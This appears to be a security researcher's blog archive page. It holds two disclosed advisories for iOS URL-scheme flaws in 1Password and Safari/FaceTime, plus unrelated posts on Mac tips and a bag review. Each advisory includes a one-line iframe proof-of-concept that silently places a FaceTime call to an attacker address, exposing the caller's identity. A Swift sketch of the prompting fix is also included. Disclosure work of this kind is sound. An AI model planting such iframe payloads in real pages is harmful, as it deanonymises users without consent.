Archive for Apple

BSidesLV Talk on iOS URL Schemes

Seeing as “RTFM 0Days” are popular for iOS today, if you are looking for those, I highly recommend watching my BSidesLV presentation. Examples start at around 10 minutes in.

RTFM 0day in iOS apps – Algorithm.dk

RTFM 0day in iOS apps: G+, Gmail, FB Messenger, etc. – Algorithm.dk.

I’ve been talking and writing about this for about a year, and this is another GREAT set of examples and techniques.
If you want to see examples as well as help on how to find these, I highly recommend that you watch my presentation, which I have just posted as well.

[CVE-2014-2584] – 1Password Launching external apps automatically through use of iframe

  • Affected Vendor: agilebits.com
  • Affected Software: 1Password for iOS
  • Affected Version: 4.x prior to 4.5.0
  • Issue Type: Lack of user confirmation leading to execution of external app
  • Release Date: April 23, 2014
  • Discovered by: Guillaume Ross / @gepeto42
  • CVE Identifier: CVE-2014-2584
  • Issue Status: Vendor has published version 4.5 which corrects this issue by prompting the user before executing another application.

Summary

1Password is a password manager for iOS which includes a web browser. The browser has features such as automatic username and password completion. Some apps, such as Facetime, provide URL Scheme functionality that could reveal the user’s identity. Apple protects some of these built-in applications by prompting the user before launching the app. As this protection is built into Safari and not into Facetime itself, 3rd party apps that include a browser are often vulnerable to this, or more precisely, enable other vulnerabilities.

Description

The 1Password browser in versions prior to 4.5.0 executed external URL Schemes automatically when they were placed in an inline frame. This could lead to issues identical to CVE-2013-6835. Applications should not trust the browser to prompt the user before triggering an action; however, because built-in apps like Facetime do so, browser vendors should include some protection. The same iframe code as for CVE-2013-6835 would trigger a Facetime-Voice call automatically, leaking the user’s “caller ID” information (phone number or registered email address).

See CWE-939 – Improper Authorization in Handler for Custom URL Scheme for more information.

Impact

A user browsing the web could click a malicious link or load a page containing a malicious link within an inline frame. The attacker can use this to trigger applications with URL Schemes that perform automatic actions, such as Facetime, and leverage those actions against the user.

Proof of Concept

<iframe src="facetime-audio://[email protected]" ></iframe>

Response Timeline

  • March 19 2014 – Vendor notified
  • March 20 2014 – Vendor acknowledges vulnerability
  • April 22 2014 – 1Password 4.5 for iOS is released and resolves the issue
  • April 23 2014 – Vulnerability Disclosed

The fix

Here is how 1Password 4.5+ behaves when opening such links.

[Image: 1Password Prompt]

1Password now prompts before launching external applications.
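
A sketch of the prompting behaviour described above for an app that embeds a WKWebView, added here as an example; it is not 1Password's code. The class name, the scheme allow-list and the choice to drop subframe requests without a prompt are assumptions of this example, the last one stricter than the prompt the advisory describes.

```swift
import UIKit
import WebKit

// Added example: navigation policy for an in-app browser (hypothetical class name).
final class PromptingNavigationDelegate: NSObject, WKNavigationDelegate {
    // Schemes the web view renders itself; anything else would leave the app.
    private let inAppSchemes: Set<String> = ["http", "https", "about"]
    private weak var presenter: UIViewController?

    init(presenter: UIViewController) {
        self.presenter = presenter
    }

    func webView(_ webView: WKWebView,
                 decidePolicyFor navigationAction: WKNavigationAction,
                 decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
        guard let url = navigationAction.request.url,
              let scheme = url.scheme?.lowercased() else {
            decisionHandler(.cancel)
            return
        }
        if inAppSchemes.contains(scheme) {
            decisionHandler(.allow)
            return
        }
        // External scheme: never hand it to another app from inside this callback.
        decisionHandler(.cancel)

        // Requests from an inline frame, from a new-window target (targetFrame is nil)
        // or from anything other than a tapped link are dropped without a prompt.
        let isMainFrame = navigationAction.targetFrame?.isMainFrame ?? false
        guard isMainFrame, navigationAction.navigationType == .linkActivated else {
            return
        }
        confirmAndOpen(url, scheme: scheme)
    }

    // The external app is launched only after the user confirms.
    private func confirmAndOpen(_ url: URL, scheme: String) {
        let alert = UIAlertController(
            title: "Open another app?",
            message: "This page wants to open a \"\(scheme)\" link in another app.",
            preferredStyle: .alert)
        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
        alert.addAction(UIAlertAction(title: "Open", style: .default) { _ in
            UIApplication.shared.open(url, options: [:], completionHandler: nil)
        })
        presenter?.present(alert, animated: true)
    }
}
```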

[CVE-2013-6835] – iOS 7.0.6 Safari/Facetime-Audio Privacy issue

  • Affected Vendor: https://www.apple.com/
  • Affected Software: Safari/Facetime on iOS
  • Affected Version: iOS 7 prior to 7.1
  • Issue Type: Lack of user confirmation leading to a call being established, revealing the user’s identity (phone number or email address)
  • Release Date: March 10, 2014
  • Discovered by: Guillaume Ross / @gepeto42
  • CVE Identifier: CVE-2013-6835
  • Issue Status: Vendor has published iOS 7.1 which resolves this issue by adding a prompt before establishing the call.

Summary

Facetime allows video calls for iOS. Facetime-audio, added in iOS 7, allows audio-only calls. The audio version uses a vulnerable URL scheme which is not used by Facetime Video.
The URL Scheme used for Facetime-Audio allows a website to establish a Facetime-audio call to the attacker’s account, revealing the phone number or email address of the user browsing the site.

By entering the URL in an inline frame, the attack is automated, and similar to a CSRF attack across apps. Safari does not prompt the user before establishing the call.

Impact

A user browsing the web could click a malicious link or load a page containing a malicious link within an inline frame. The user would then automatically contact the phone number or email address specified in the URL, revealing his identity to the attacker.

Proof of Concept

Entering the following URL in iOS would trigger the call to the email address specified: facetime-audio://[email protected]

This inline frame would have the user call the specified email address as soon as the HTML page is loaded, without prompting the user:

<iframe src="facetime-audio://[email protected]" ></iframe>

External link: Security Content of iOS 7.1

Rage inducing quit fix for VMware Fusion and Cmd-Q

Sick of hitting cmd-q to quit an app in a VM but then shutting down VMware Fusion and 6 VMs that get suspended and that you need to restart and ARGHH?

Who isn’t?

Just go in Fusion’s preference menu and do this.

[Image: CMD_Q]

It’ll work as long as the mouse focus is in a VM. If you hit cmd-q while Fusion has focus but no VM does, you will still end up quitting Fusion.

This should still resolve 90% of my ARGH-quits.

Review of the Thule Attaché 15 for Macbook Pro and iPad – Retina too!

If you recently got your MacBook Pro with Retina display(tm) – which we will call rMBP here, you’ve probably been searching for a good bag to go with it. 
Not many bags exist that were made exactly for the rMBP, however, any regular MBP 15 bag will fit it. The trick was to find one that fit the non Retina MBP as tightly as possible and to use that.

SFBags, Tom Bihn, etc. all have stuff available, but I don’t dig the look of nylon and other “nice leathers” available at SFBags. I also don’t dig having to use a separate sleeve for my laptop. When I want to take it out, I don’t want to mess around. I also prefer to not pay $300 for a bag. Insert stuff about being too cheap to “properly protect your investment that you paid so much for blah blah”.

Here’s a quick review of the Thule Attaché 15 for iPad and Macbook Pro. Pictures are at the end.

Removing broken links from sidebar in Lion

A very small post for people searching about this specific issue:

You’re trying to delete an icon/shortcut from the sidebar in Finder, under Mac OS X Lion/10.7.

Right clicking doesn’t work, because that folder does not exist, or maybe it points to a share using an old version of AFP or SMB that you can’t connect to, because some company that almost has the same name as a famous dog if you pronounce it in French is a bad company that doesn’t update the firmware on any hardware old enough to have a lot of important data on it.

What you need to do is hold command and drag it to Trash instead of doing a right click.